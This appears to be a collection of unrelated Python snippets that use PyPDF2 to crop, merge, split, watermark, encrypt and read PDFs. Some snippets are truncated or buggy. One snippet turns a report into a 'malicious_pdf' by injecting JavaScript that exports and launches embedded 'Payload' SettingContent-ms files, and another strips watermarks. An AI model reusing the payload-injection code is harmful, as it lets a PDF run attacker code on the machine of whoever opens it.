#!/usr/bin/python # from PyPDF2 import PdfFileWriter, PdfFileReader input1 = PdfFileReader(file("BrewPi-HERMS-drawing-uncropped.pdf", "rb")) output = PdfFileWriter() numPages = input1.getNumPages() print "document has %s pages." % numPages for i in range(numPages): page = input1.getPage(i) print page.mediaBox.getUpperRight_x(), page.mediaBox.getUpperRight_y() page.mediaBox.upperRight = ( page.mediaBox.getUpperRight_x(), page.mediaBox.getUpperRight_y() - 100 ) print page.mediaBox.getLowerLeft_x(), page.mediaBox.getLowerLeft_y() if i == 0: upperLeft = page.mediaBox.getUpperLeft_y()/4*3-60 else: upperLeft = page.mediaBox.getUpperLeft_y()/4*3+60 page.mediaBox.lowerLeft = ( page.mediaBox.getLowerLeft_x(), upperLeft ) output.addPage(page) outputStream = file("BrewPi-HERMS-drawing.pdf", "wb") output.write(outputStream)
def bind(path, title, meta=None, verbose=False): ''' Concatenate all PDF files from a folder into a single file path: where to search for chapters and save the final PDF file title: name of the final PDF file meta: dict to provide metadata to be written into the pdf from: https://www.binpress.com/tutorial/manipulating-pdfs-with-python/167 ''' title = title[0:30] if title.endswith('.pdf'): filename = title else: filename = title + '.pdf' filepath = os.path.join(path, filename) #print(filepath) if os.path.isfile(filepath): print( 'Target file already exists. Aborting concatenation of PDF files!') return 1 merger = PdfFileWriter() # TODO parse the meta meta from the webpage and combine with user input if meta: for k in meta.keys(): if not k.startswith('/'): meta['/' + k] = meta.pop(k) merger.addMetadata(meta) # TODO add cover page from TIFF, not possible with PyPDF2 files = [x for x in os.listdir(path) if x.endswith('.pdf')] #print(files) file_handles = [] file_digests = [] for fname in sorted(files): fil = open(os.path.join(path, fname), 'rb') dig = hashlib.md5(fil.read()).hexdigest() if dig in file_digests: print('Duplicate detected: {0}'.format(fname)) fil.close() continue file_handles.append(fil) file_digests.append(dig) if verbose: doc = PdfFileReader(fil) else: doc = PdfFileReader(fil, warndest=open(os.devnull, 'w')) merger.appendPagesFromReader(doc) nupa = doc.numPages % 2 if nupa == 1: merger.addBlankPage() out = open(filepath, 'wb') merger.write(out) out.close() for fh in file_handles: fh.close() print("Saved concatenated PDF files as '{0}' in '{1}'".format( filename, os.path.abspath(path))) return 0
def _post_pdf(self, save_in_attachment, pdf_content=None, res_ids=None): '''Merge the existing attachments by adding one by one the content of the attachments and then, we add the pdf_content if exists. Create the attachments for each record individually if required. :param save_in_attachment: The retrieved attachments as map record.id -> attachment_id. :param pdf_content: The pdf content newly generated by wkhtmltopdf. :param res_ids: the ids of record to allow postprocessing. :return: The pdf content of the merged pdf. ''' def close_streams(streams): for stream in streams: try: stream.close() except Exception: pass # Check special case having only one record with existing attachment. if len(save_in_attachment) == 1 and not pdf_content: return base64.decodestring( list(save_in_attachment.values())[0].datas) # Create a list of streams representing all sub-reports part of the final result # in order to append the existing attachments and the potentially modified sub-reports # by the postprocess_pdf_report calls. streams = [] # In wkhtmltopdf has been called, we need to split the pdf in order to call the postprocess method. if pdf_content: pdf_content_stream = io.BytesIO(pdf_content) # Build a record_map mapping id -> record record_map = { r.id: r for r in self.env[self.model].browse( [res_id for res_id in res_ids if res_id]) } # If no value in attachment or no record specified, only append the whole pdf. if not record_map or not self.attachment: streams.append(pdf_content_stream) else: if len(res_ids) == 1: # Only one record, so postprocess directly and append the whole pdf. if res_ids[0] in record_map and not res_ids[ 0] in save_in_attachment: new_stream = self.postprocess_pdf_report( record_map[res_ids[0]], pdf_content_stream) # If the buffer has been modified, mark the old buffer to be closed as well. if new_stream and new_stream != pdf_content_stream: close_streams([pdf_content_stream]) pdf_content_stream = new_stream streams.append(pdf_content_stream) else: # In case of multiple docs, we need to split the pdf according the records. # To do so, we split the pdf based on outlines computed by wkhtmltopdf. # An outline is a <h?> html tag found on the document. To retrieve this table, # we look on the pdf structure using pypdf to compute the outlines_pages that is # an array like [0, 3, 5] that means a new document start at page 0, 3 and 5. reader = PdfFileReader(pdf_content_stream) if reader.trailer['/Root'].get('/Dests'): outlines_pages = sorted([ outline.getObject()[0] for outline in reader.trailer['/Root']['/Dests'].values() ]) assert len(outlines_pages) == len(res_ids) for i, num in enumerate(outlines_pages): to = outlines_pages[i + 1] if i + 1 < len( outlines_pages) else reader.numPages attachment_writer = PdfFileWriter() for j in range(num, to): attachment_writer.addPage(reader.getPage(j)) stream = io.BytesIO() attachment_writer.write(stream) if res_ids[i] and res_ids[ i] not in save_in_attachment: new_stream = self.postprocess_pdf_report( record_map[res_ids[i]], stream) # If the buffer has been modified, mark the old buffer to be closed as well. if new_stream and new_stream != stream: close_streams([stream]) stream = new_stream streams.append(stream) close_streams([pdf_content_stream]) else: # If no outlines available, do not save each record streams.append(pdf_content_stream) # If attachment_use is checked, the records already having an existing attachment # are not been rendered by wkhtmltopdf. So, create a new stream for each of them. if self.attachment_use: for attachment_id in save_in_attachment.values(): content = base64.decodestring(attachment_id.datas) streams.append(io.BytesIO(content)) # Build the final pdf. # If only one stream left, no need to merge them (and then, preserve embedded files). if len(streams) == 1: result = streams[0].getvalue() else: result = self._merge_pdfs(streams) # We have to close the streams after PdfFileWriter's call to write() close_streams(streams) return result
def read(input_pdf): pdf_reader = PdfFileReader(input_pdf) print(pdf_reader.getDocumentInfo())
def get_pypdf_images(pdf_path): pdfInput = PdfFileReader(open(pdf_path, 'rb')) return get_image_res(pdfInput)
file = input('Enter the pdf name without ".pdf" \n') file = file + '.pdf' output = input( 'Enter the pdf name you want to give to your modified pdf file without ".pdf" \n' ) output = output + '.pdf' pages_to_remove = input('Enter the pages to be removed: ') pages_to_remove = pages_to_remove.split(' ') for page in range(len(pages_to_remove)): pages_to_remove[page] = abs(int(pages_to_remove[page])) given_pdf = PdfFileReader(file, 'r') num_pages = given_pdf.numPages if num_pages > 1: with open(output, 'wb') as new_file: writer = PdfFileWriter() for i in range(num_pages): if i + 1 in pages_to_remove: continue else: p = given_pdf.getPage(i) writer.addPage(p) writer.write(new_file) print('Removed Successfully!!') else:
from google.cloud import vision from google.cloud.vision import types from PIL import Image, ImageDraw, ImageFont from collections import defaultdict from spacy.tokens import Span from tempfile import mkstemp from shutil import move from os import fdopen, remove from enum import Enum from math import * from PyPDF2 import PdfFileWriter, PdfFileReader #Load File file_name = str(sys.argv[1]) inputpdf = PdfFileReader(open(file_name, "rb"), strict=False) prefix = sys.argv[1][sys.argv[1].rfind('/') + 1:-4] #Separate each page of the pdf documents = [] for i in range(inputpdf.numPages): output = PdfFileWriter() output.addPage(inputpdf.getPage(i)) with open(file_name[0:file_name.rfind('/') + 1] + prefix + "doc%s.pdf" % i, "wb") as outputStream: output.write(outputStream) documents.append(file_name[0:file_name.rfind('/') + 1] + prefix + "doc%s.pdf" % i) #Convert each page into an image ee = extractjpg.extractor()
def parsePDF(path): # DATABASE CONNECTION mydb = mysql.connector.connect(host='23.229.190.133', port='3306', user='******', password='******', database='TAMUHackClass') mycursor = mydb.cursor() # Clean old data file if os.path.exists('data.csv'): os.remove('data.csv') # Fetch new PDF if os.path.exists(path): os.remove(path) regex = "[0-9]{5}" year = ''.join(re.findall(regex, path)) url = 'http://web-as.tamu.edu/gradereport/PDFReports/' + year + '/' + path response = urllib2.urlopen(url) with open(path, 'wb') as f: while True: content = response.read() if not content: break f.write(content) with open(path, 'rb') as f: pdf = PdfFileReader(f) profs = [] courses = [] grades = [] gpa = [] for i in range(pdf.numPages): page = pdf.getPage(i) # print('Page type : {}'.format(str(type(page)))) # Encode to ASCII to remove unintentional Unicode characters text = page.extractText().encode('ascii', 'ignore') # Check to make sure PDF page is not empty (has at least 1 course) if isNotEmpty(text): # Remove percentages, header text, and course and department totals text = cleanText(text) text = cleanHeader(text) # Group each data type into lists profs += extractProf(text) profsSQL = extractProf(text) courses += extractCourses(text) coursesSQL = extractCourses(text) # grades += extractGrades(text) gradeSQL = extractGrades(text) gpa += extractGPA(text) gpaSQL = extractGPA(text) for i in range(len(profsSQL)): s = profsSQL[i] lastName = s.rsplit(' ', 1)[0] firstName = s.rsplit(' ', 1)[1] sql = "INSERT INTO Professors (Prof_id, Prof_FirstName, Prof_LastName) VALUES (null, %s, %s)" val = (firstName, lastName) mycursor.execute(sql, val) mydb.commit() print(mycursor.rowcount, "record inserted.") for i in range(len(coursesSQL)): c = coursesSQL[i] dept = c[0:4] courseNum = c[5:8] print dept print courseNum sql = "INSERT INTO Classes (Class_id, Class_Dept, Course_No) VALUES (null, %s, %s)" val = (dept, courseNum) mycursor.execute(sql, val) mydb.commit() print(mycursor.rowcount, "record inserted.") for i in range(len(coursesSQL)): c = coursesSQL[i] dept = c[0:4] courseNum = c[5:8] sectionNum = c[9:12] gpaQ = gpaSQL[i] # for j in range(len(gradeSQL)): aGrade = gradeSQL[i * 12] bGrade = gradeSQL[i * 12 + 1] cGrade = gradeSQL[i * 12 + 2] dGrade = gradeSQL[i * 12 + 3] fGrade = gradeSQL[i * 12 + 4] iGrade = gradeSQL[i * 12 + 6] sGrade = gradeSQL[i * 12 + 7] uGrade = gradeSQL[i * 12 + 8] qGrade = gradeSQL[i * 12 + 9] xGrade = gradeSQL[i * 12 + 10] sql = "INSERT INTO Sections (Section_ID, Section_Name, Course_Num, Section_Num, Instructor_ID, A_Grade, " \ "B_Grade, C_Grade, D_Grade, F_Grade, GPA, I_Grade, S_Grade, U_Grade, Q_Grade, X_Grade, " \ "Section_year, Section_term, Class_id) VALUES (null, %s, %s, %s, 001, %s, %s, %s, %s, %s, %s, %s, %s, %s," \ "%s, %s, %s, %s, 001)" val = (dept, courseNum, sectionNum, aGrade, bGrade, cGrade, dGrade, fGrade, gpaQ, iGrade, sGrade, uGrade, qGrade, xGrade, 2018, "Spring") mycursor.execute(sql, val) mydb.commit() print(mycursor.rowcount, "record inserted.") # Output lists to CSV outputCSV(profs, courses, gpa)
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2021/5/2 上午9:30 # @Author : silianpan # @Site : # @File : __init__.py.py # @Software: PyCharm from pathlib import Path from PyPDF2 import PdfFileReader, PdfFileWriter src_folder = Path('/Users/liupan/work/code/seal-python-tools/pdf_process/公告/') file_list = list(src_folder.glob('*.PDF')) for pdf in file_list: inputfile = PdfFileReader(str(pdf)) outputfile = PdfFileWriter() pageCount = inputfile.getNumPages() for page in range(pageCount): outputfile.addPage(inputfile.getPage(page)) outputfile.encrypt('123456') des_name = f'{pdf.stem}_secret.pdf' des_file = src_folder / des_name with open(des_file, 'wb') as f_out: outputfile.write(f_out)
def loadFromStream(self, stream): if usepypdf2: self.reader = PdfFileReader(stream, strict=False) else: self.reader = PdfFileReader(stream)
def apply_watermark_to_pdf_file(base_filename, complete_filename, annex_number): # Original fil (rb = open file for reading) original_pdf = open(complete_filename, 'rb') # Error when using Strict: "Xref table not zero-indexed. ID numbers for objects will be corrected" pdf_reader = PdfFileReader(original_pdf, strict=False) packet = io.BytesIO() can = canvas.Canvas(packet) for i in range(pdf_reader.numPages): page_num = can.getPageNumber() can.setFont("Helvetica", 20) text = f'{annex_number}-{format(page_num, "03d")}' # Count number of characters and multiply to calculate the width. ( x * 10 ) characters_in_annex_number = len(text) page_center = (int(pdf_reader.pages[i].mediaBox[2]) / 2) - (characters_in_annex_number * 5) page_top = int(pdf_reader.pages[i].mediaBox[3]) - 30 can.setFillColor(white) can.rect(page_center, page_top - 8, characters_in_annex_number * 10, 30, fill=1, stroke=0) can.setFillColor(red) can.drawString(page_center, page_top, text) can.showPage() can.save() packet.seek(0) pdf_watermark_reader = PdfFileReader(packet) pdf_writer = PdfFileWriter() for pageNum in range(0, pdf_reader.numPages): original_page = pdf_reader.getPage(pageNum) original_page.mergePage(pdf_watermark_reader.getPage(pageNum)) pdf_writer.addPage(original_page) # wb = create file for writing # Add "Bilageret" at the end of the filename index = base_filename.find('.pdf') base_filename_with_bilageret = base_filename[: index] + f' - Bilageret {datetime.now().date()}' + base_filename[ index:] result_pdf = open( os.path.join(destination_folder, base_filename_with_bilageret), 'wb') pdf_writer.write(result_pdf) # Close PDF file original_pdf.close() # Return number of pages return pdf_reader.numPages
def cedula_hallazgo(documento): domicilio, gerente, supervisor, funcionarios, apoyo = documento_info( documento) output = PdfFileWriter() # create response object response = HttpResponse(content_type='application/pdf') response[ 'Content-Disposition'] = 'attachment; filename=Cedula_de_Hallazgo.pdf' buffer = StringIO() doc = SimpleDocTemplate(buffer, pagesize=letter, rightMargin=72, leftMargin=72, topMargin=50, bottomMargin=100) styles = getSampleStyleSheet() styles.add(ParagraphStyle(name='Center', alignment=TA_CENTER, fontSize=8)) styles.add(ParagraphStyle(name='Justify', alignment=TA_JUSTIFY, fontSize=8)) Story = [] I = Image(os.path.join(settings.BASE_DIR, 'static', 'img', 'logo.png')) I.drawHeight = 1.25 * inch * I.drawHeight / I.drawWidth I.drawWidth = 1.25 * inch data = [[I, '', '', '', '', ''], ['SUJETO PASIVO:', '', '', '', '', ''], ['MATERIA:', '', '', '', '', '']] data[0][2] = Paragraph( u'''<b>CEDULA DE HALLAZGOS<br/> Contribución Especial del 1% por la Presentación de<br/> Servicios Turísticos</b>''', styles["Center"]) data[0][4] = documento.codigo data[1][1] = documento.pst.nombre_o_razon() data[1][3] = 'RIF: ' + documento.pst.rif data[2][1] = documento.hallazgos_materia data[2][3] = 'PERIODO: ' + documento.fecha_notificacion.strftime( "%d/%m/%Y") w = [80, 30, 90, 90, 80, 80] Story.append( Table(data, colWidths=w, style=[('GRID', (0, 0), (-1, -1), 0.25, colors.black), ('ALIGN', (0, 0), (-1, 0), 'CENTER'), ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'), ('FONTSIZE', (0, 0), (-1, -1), 8), ('SPAN', (0, 0), (1, 0)), ('SPAN', (2, 0), (3, 0)), ('SPAN', (4, 0), (5, 0)), ('SPAN', (1, 1), (2, 1)), ('SPAN', (1, 2), (2, 2)), ('SPAN', (3, 1), (5, 1)), ('SPAN', (3, 2), (5, 2))])) Story.append(Spacer(1, 12)) data = [['CONDICIÓN', 'CRITERIO', 'EFECTO', 'EVIDENCIA'], ['', '', '', ''], ['', '', '', '']] try: data[2][0] = Paragraph(documento.hallazgos_condicion, styles["Justify"]) data[2][1] = Paragraph(documento.hallazgos_criterio, styles["Justify"]) data[2][2] = Paragraph(documento.hallazgos_efecto, styles["Justify"]) data[2][3] = Paragraph(documento.hallazgos_evidencia, styles["Justify"]) except: pass Story.append( Table(data, colWidths=[95, 170, 81, 105], style=[ ('GRID', (0, 0), (-1, 0), 0.25, colors.black), ('GRID', (0, 2), (-1, 2), 0.25, colors.black), ('FONTSIZE', (0, 0), (-1, -1), 8), ('ALIGN', (0, 0), (-1, 0), 'CENTER'), ('BACKGROUND', (0, 0), (-1, 0), colors.grey), ('VALIGN', (0, 2), (-1, 2), 'TOP'), ])) Story.append(Spacer(1, 12)) ptext = 'Observaciones: <u>%s</u>' % documento.observaciones Story.append(Paragraph(ptext, styles['Normal'])) Story.append(Spacer(1, 12)) Story.append( Paragraph('Fiscal Actuante: %s' % gerente.get_full_name(), styles['Normal'])) Story.append( Paragraph('Supervisor: %s' % supervisor.get_full_name(), styles['Normal'])) doc.build(Story) watermark = PdfFileReader(buffer) output.addPage(watermark.getPage(0)) output.write(response) return response
def constancia(documento): new_page = False domicilio, gerente, supervisor, funcionarios, apoyo = documento_info( documento) texto = text_constancia(documento, supervisor, funcionarios) p = ParagraphStyle('test') p.textColor = 'black' p.alignment = TA_JUSTIFY p.fontSize = 10 p.leading = 12 if domicilio: para = Paragraph(unicode(domicilio), p) else: para = Paragraph(unicode("No tiene registro de domicilio"), p) para_texto = Paragraph(unicode(texto), p) output = PdfFileWriter() input = PdfFileReader( file( os.path.join(settings.PDF_ROOT, 'fiscalizacion', 'CONSTANCIA.pdf'), 'rb')) # create response object response = HttpResponse(content_type='application/pdf') response[ 'Content-Disposition'] = 'attachment; filename=Fiscalizacion_Constancia.pdf' # get number of pages num_pages = input.getNumPages() buffer = StringIO() # create string buffer for PDF pdf = canvas.Canvas(buffer, pagesize=letter) pdf.drawString(220, 793, unicode(documento.pst.razon_social)) pdf.drawString(220, 779, unicode(documento.pst.rif)) if documento.pst.rtn != None: pdf.drawString(220, 766, unicode(documento.pst.rtn)) else: pdf.drawString(220, 766, u'S/RTN') pdf.drawString(80, 850, unicode(documento.codigo)) para.wrapOn(pdf, 300, 50) para.drawOn(pdf, 220, 762 - para.height) para_texto.wrapOn(pdf, 450, 300) para_texto.drawOn(pdf, 80, 730 - para_texto.height) pasivo(pdf, 730 - para_texto.height) supervisor_end = supervisor_firma(pdf, 730 - para_texto.height, supervisor) for funcionario in xrange(len(funcionarios)): supervisor_end = funcionario_firma(pdf, supervisor_end, funcionarios[funcionario]) if supervisor_end <= 114 and funcionario != len(funcionarios) - 1: new_page = True start_funcionario = funcionario + 1 break pdf.save() # put on watermark from buffer watermark = PdfFileReader(buffer) tmp = input.getPage(0) tmp.mergePage(watermark.getPage(0)) buffer.seek(0) # add processed pdf page output.addPage(tmp) if new_page: buffer = StringIO() # create string buffer for PDF pdf = canvas.Canvas(buffer, pagesize=letter) supervisor_end = 850 for funcionario in xrange(start_funcionario, len(funcionarios)): supervisor_end = funcionario_firma(pdf, supervisor_end, funcionarios[funcionario]) pdf.save() # put on watermark from buffer watermark = PdfFileReader(buffer) input = PdfFileReader( file( os.path.join(settings.PDF_ROOT, 'fiscalizacion', 'PROVIDENCIA.pdf'), 'rb')) tmp = input.getPage(3) tmp.mergePage(watermark.getPage(0)) buffer.seek(0) # add processed pdf page output.addPage(tmp) output.write(response) return response
def providencia(documento): mes_letras = { 1: 'Enero', 2: 'Febrero', 3: 'Marzo', 4: 'Abril', 5: 'Mayo', 6: 'Junio', 7: 'Julio', 8: 'Agosto', 9: 'Septiembre', 10: 'Octubre', 11: 'Noviembre', 12: 'Diciembre', } def text_to_bold(text): return u'''<b><font size=12>{}</font></b> <br/>'''.format(text) def print_text_bold(text, x, y, pdf): p = ParagraphStyle('test') p.textColor = 'black' p.alignment = TA_LEFT p.fontSize = 8 p.leading = 9 para = Paragraph(text_to_bold(unicode(text)), p) para.wrapOn(pdf, 300, 50) para.drawOn(pdf, x, y) def get_fecha(): from datetime import date d = date.today() fecha = "Caracas, {dia_letra} ({dia}) de {mes} de {anyo}".format( dia_letra=NumToWord.get_month_words(d.day), dia=str(d.day), mes=mes_letras[d.month], anyo=str(d.year)) return fecha domicilio, gerente, supervisor, funcionarios, apoyo = documento_info( documento) texto = text_providencia(supervisor, funcionarios, apoyo) p = ParagraphStyle('test') p.textColor = 'black' p.alignment = TA_LEFT p.fontSize = 10 p.leading = 12 para = Paragraph(text_to_bold(unicode(domicilio)), p) para_texto = Paragraph(unicode(texto), p) output = PdfFileWriter() input = PdfFileReader( file( os.path.join(settings.PDF_ROOT, 'fiscalizacion', 'PROVIDENCIA.pdf'), 'rb')) # create response object response = HttpResponse(content_type='application/pdf') response[ 'Content-Disposition'] = 'attachment; filename=Fiscalizacion_Providencia.pdf' fecha = get_fecha() # get number of pages num_pages = input.getNumPages() for page in xrange(num_pages - 1): new_page = False buffer = StringIO() # create string buffer for PDF pdf = canvas.Canvas(buffer, pagesize=letter) fecha_codigo_y = 7 if page == 2 else 0 y_minus = 15 if page == 2 else 0 print_text_bold(unicode(documento.pst.razon_social), 220, 770 + y_minus, pdf) print_text_bold(unicode(documento.pst.rif), 220, 752 + y_minus, pdf) if documento.pst.rtn != None: text_rtn = unicode(documento.pst.rtn) else: text_rtn = u'S/RTN' print_text_bold(text_rtn, 220, 737 + y_minus, pdf) pdf.drawString(80, 830 + (y_minus - fecha_codigo_y), unicode(documento.codigo)) pdf.drawString(335, 830 + (y_minus - fecha_codigo_y), unicode(fecha)) para.wrapOn(pdf, 300, 50) para.drawOn(pdf, 220, 695 + y_minus) para_texto.wrapOn(pdf, 450, 300) para_texto.drawOn(pdf, 80, 675 - para_texto.height) # datos de gerente if 675 - para_texto.height > 230: gaceta_end = gaceta(pdf, 675 - para_texto.height, gerente) notificacion(pdf, gaceta_end) label(pdf, gaceta_end, page) else: new_page = True pdf.save() # put on watermark from buffer watermark = PdfFileReader(buffer) tmp = input.getPage(page) tmp.mergePage(watermark.getPage(0)) buffer.seek(0) # add processed pdf page output.addPage(tmp) if new_page: buffer = StringIO() # create string buffer for PDF pdf = canvas.Canvas(buffer, pagesize=letter) # cuadro que contiene los datos del pst gaceta_end = gaceta(pdf, 800, gerente) notificacion(pdf, gaceta_end) label(pdf, gaceta_end, page) pdf.save() # put on watermark from buffer watermark = PdfFileReader(buffer) input = PdfFileReader( file( os.path.join(settings.PDF_ROOT, 'fiscalizacion', 'PROVIDENCIA.pdf'), 'rb')) tmp = input.getPage(3) tmp.mergePage(watermark.getPage(0)) buffer.seek(0) # add processed pdf page output.addPage(tmp) output.write(response) return response
from PyPDF2 import PdfFileWriter, PdfFileReader import os files = [file for file in os.listdir() if file.endswith(".pdf")] number = 1000 for file in files: # get the source input1 = PdfFileReader(open(file, "rb")) # one file to x files (one page == one file) for page in range(input1.getNumPages()): output = PdfFileWriter() output.addPage(input1.getPage(page)) outputStream = open("{:04d}.pdf".format(number), "wb") output.write(outputStream) outputStream.close() number += 1
import io from reportlab.pdfgen import canvas from reportlab.lib.pagesizes import A4 import reportlab.rl_config reportlab.rl_config.warnOnMissingFontGlyphs = 0 from reportlab.pdfbase import pdfmetrics from reportlab.pdfbase.ttfonts import TTFont font = '/media/capricorn/Home/Master/Code/Python/Core/learn_python/resource/Aparajita.ttf' pdfmetrics.registerFont(TTFont('Marathi', font)) buffer = io.BytesIO() # create a new PDF with Reportlab can = canvas.Canvas(buffer, pagesize=A4) can.setFont('Marathi', 14) can.drawString(137, 604, "अनुराग") can.save() # move to the beginning of the StringIO buffer buffer.seek(0) new_pdf = PdfFileReader(buffer) # read your existing PDF existing_pdf = PdfFileReader(open("/media/capricorn/Home/Master/Code/Python/Core/learn_python/resource/tc_format.pdf", "rb")) output = PdfFileWriter() # add the "watermark" (which is the new pdf) on the existing page page = existing_pdf.getPage(0) page.mergePage(new_pdf.getPage(0)) output.addPage(page) # finally, write "output" to a real file outputStream = open("destination.pdf", "wb") output.write(outputStream) outputStream.close()
text = pageObj.extractText().split(" ") orderNum = turnToNum(text[0]) revNum = turnToNum(text[4]) return orderNum, revNum # Writes pages stored from PdfFileWriter into a PDF file with order and revision number as the file name. # Closes the file stream. def writeToFile(oNum, rNum, writerObj): output = oNum + " POC" + rNum + ".pdf" outputStream = open(output, "wb") writerObj.write(outputStream) outputStream.close() # Initialize a reader and writer object. inputStream = open("test3.pdf", "rb") reader = PdfFileReader(inputStream) writer = PdfFileWriter() # Get order number and revision number from first page of PDF. orderNum, revNum = orderRevNum(reader, 0) # For each page in PDF, get order and revision number. for pageNum in range(reader.getNumPages()): currOrderNum, currRevNum = orderRevNum(reader, pageNum) # If order number of the last page does not match the current order number, write pages from writer object to # a PDF with the order and revision number as the file name. Close output file stream. Reset writer object to get rid # of previously passed in pages. Set the current order and revision number as the older order and revision number # for comparison. if orderNum != currOrderNum: writeToFile(orderNum, revNum, writer)
# Create a PDF device object. device = PDFDevice(rsrcmgr) # BEGIN LAYOUT ANALYSIS # Set parameters for analysis. laparams = LAParams() # Create a PDF page aggregator object. device = PDFPageAggregator(rsrcmgr, laparams=laparams) # Create a PDF interpreter object. interpreter = PDFPageInterpreter(rsrcmgr, device) file1 = PdfFileReader(file( '/home/david/Downloads/Ben Clark - Red Team Field Manual.pdf', "rb"), strict=False) output = PdfFileWriter() count = 1 for page in PDFPage.create_pages(document): if count >= 1: print( "###################################################################", count, "########################################################") #print(page) # read the page into a layout object interpreter.process_page(page)
import base64 import binascii import os from PyPDF2 import PdfFileWriter, PdfFileReader malicious_pdf = PdfFileWriter() # Open file passed as -i parameter with open("rapport_pop.pdf", "rb") as f: pdfReader = PdfFileReader(f) # Copy pages of original pdf file to malicious pdf file for page in range(pdfReader.numPages): pageObj = pdfReader.getPage(page) malicious_pdf.addPage(pageObj) malicious_pdf.addJS( "var files = [\"Payload\", \"psFile\"]; for (var i = 0; i < files.length; i++) { this.exportDataObject( {cName: files[i] + \".SettingContent-ms\", nLaunch: 2} ); }" ) # malicious_pdf.addJS('this.exportDataObject({cName: "Payload.SettingContent-ms", nLaunch:2});') output = open("rapport_pop_malicious.pdf", "wb+") malicious_pdf.write(output) output.close()
# importing required modules from PyPDF2 import PdfFileReader # creating a pdf file object pdfFileObj = open( 'D:\Personal\Folder1\Expense Claims\Globe Moving\Sales - Invoice DEL002368.pdf', 'rb') # creating a pdf reader object pdfReader = PdfFileReader(pdfFileObj) # printing number of pages in pdf file print(pdfReader.numPages) content = "" for i in range(0, pdfReader.numPages): content += pdfReader.getPage(i).extractText() + "\n" print(content) # # creating a page object # pageObj = pdfReader.getPage(0) # # extracting text from page # print(pageObj.extractText()) # # closing the pdf file object # pdfFileObj.close()
metavar='text', required=True, help='The text to use as watermark') args = parser.parse_args() input_file_path = args.input_file merged_file_path = args.output_file watermark_text = args.text ## Get PDF width-height pdf_height = 0 pdf_width = 0 with io.open(input_file_path, mode='rb') as org_file: org_pdf = PdfFileReader(org_file) box = org_pdf.getPage(0).mediaBox pdf_height = box.getHeight() pdf_width = box.getWidth() ## 1. Create a canvas for the watermark text c = canvas.Canvas('watermark.pdf') c.setPageSize((pdf_width, pdf_height)) c.setFillColorRGB(1, 0.70, 0.70, 0.5) c.setFont('Helvetica-Bold', 36) textWidth = stringWidth(watermark_text, 'Helvetica-Bold', 36) c.drawString( float(pdf_width) - float(textWidth) - float(15), float(pdf_height) - float(40), watermark_text)
from PyPDF2 import PdfFileWriter, PdfFileReader import glob from pathlib import Path import os paths = glob.glob(r'Q:\GEO_PROJECT\sp_TEST\01_to_09_00\*\Page*.pdf') for path in paths: print('Splitting: ' + str(path)) f = open(path, "rb") inputpdf = PdfFileReader(f) parent_path = Path(path).parents[0] for i in range(inputpdf.numPages): output = PdfFileWriter() output.addPage(inputpdf.getPage(i)) with open(str(parent_path) + "\\document-page%s.pdf" % (i+1), "wb") as outputStream: output.write(outputStream) f.close() os.remove(path)
from PyPDF2 import PdfFileWriter, PdfFileReader i = 0 pdf = PdfFileReader('doc2.pdf', 'rb') outp = PdfFileWriter() while i < pdf.getNumPges(): if type == "ACT" or "PDF": outp.addPage(pdf.getPages(i + 0)) outp.addPage(pdf.getPages(i + 1)) outp.addPage(pdf.getPages(i + 2)) outp.addPage(pdf.getPages(i + 4)) outp.addPage(pdf.getPages(i + 6)) outp.addPage(pdf.getPages(i + 8)) else: outp.addPage(pdf.getPages(i + 0)) outp.addPage(pdf.getPages(i + 1)) outp.addPage(pdf.getPages(i + 2)) outp.addPage(pdf.getPages(i + 4)) outp.addPage(pdf.getPages(i + 6)) outp.addPage(pdf.getPages(i + 8)) outp.addPage(pdf.getPages(i + 10)) outp.addPage(pdf.getPages(i + 11)) p = pdf.getPages()
from skimage import io from PyPDF2 import PdfFileReader from pdf2image import convert_from_path import numpy as np import os from PIL import Image from fpdf import FPDF import shutil pdfFile = input('PDF file location: ') dirname = os.path.dirname(os.path.normpath(pdfFile)) outputFile = os.path.basename(pdfFile) outputFile = os.path.splitext(outputFile)[0] pdf_reader = PdfFileReader(pdfFile) pages = pdf_reader.getNumPages() rang = int(pages) + 1 # Select the pixel from the extracted images of pdf pages def select_pixel(r,g,b): if r > 120 and r < 254 and g > 120 and g < 254 and b > 120 and b < 254: return True else: return False # Handling of images for removing the watermark def handle(imgs): for i in range(imgs.shape[0]): for j in range(imgs.shape[1]): if select_pixel(imgs[i][j][0],imgs[i][j][1],imgs[i][j][2]): imgs[i][j][0] = imgs[i][j][1] = imgs[i][j][2] = 255 return imgs
from PyPDF2 import PdfFileMerger, PdfFileReader import os newFile = PdfFileMerger() files = [] output = 'output/' if not os.path.exists(output): os.mkdir(output) for filename in files: newFile.append(PdfFileReader(filename + '.pdf', 'rb')) newFile.write(output + ".pdf")
from PyPDF2 import PdfFileReader, PdfFileWriter file_path = 'book.pdf' pdf = PdfFileReader(file_path) with open('my_output.txt', 'w') as f: for page_num in range(pdf.numPages): print('page: {}'.format(page_num)) pageObj = pdf.getPage(page_num) try: txt = pageObj.extractText() print(''.center(100, '-')) except: f.write('Page {0}\n'.format(page_num + 1)) f.write(''.center(100, '-')) f.write(txt) f.close()
import os from PyPDF2 import PdfFileWriter, PdfFileReader if not os.path.exists("./cern-pages"): os.mkdir("cern-pages") with open("./CERN.pdf", "rb") as pdf_file: pdf = PdfFileReader(pdf_file) num_pages = pdf.numPages for i in range(num_pages): output = PdfFileWriter() output.addPage(pdf.getPage(i)) with open(f"cern-pages/page-{i}.pdf", "wb") as pdf_file: output.write(pdf_file) print("Successfully extracted PDF file into %d pages" % num_pages)
from PyPDF2 import PdfFileReader import re i = 0 with open("energy_usage.pdf", "rb") as f: pdf = PdfFileReader(f) for i in range(pdf.getNumPages()): page = pdf.getPage(i) print(page.extractText()) print('XXX_NEW_LINE_XXX') i += 1 # if i == 10000000 : exit()
def get_pdf_size(pdf: typing.Union[str, typing.IO[bytes]], page_id: int) -> typing.Tuple[int, int]: input_pdf = PdfFileReader(pdf) page = input_pdf.getPage(page_id).mediaBox size = (int(page.getUpperRight_x()), int(page.getUpperRight_y())) return size
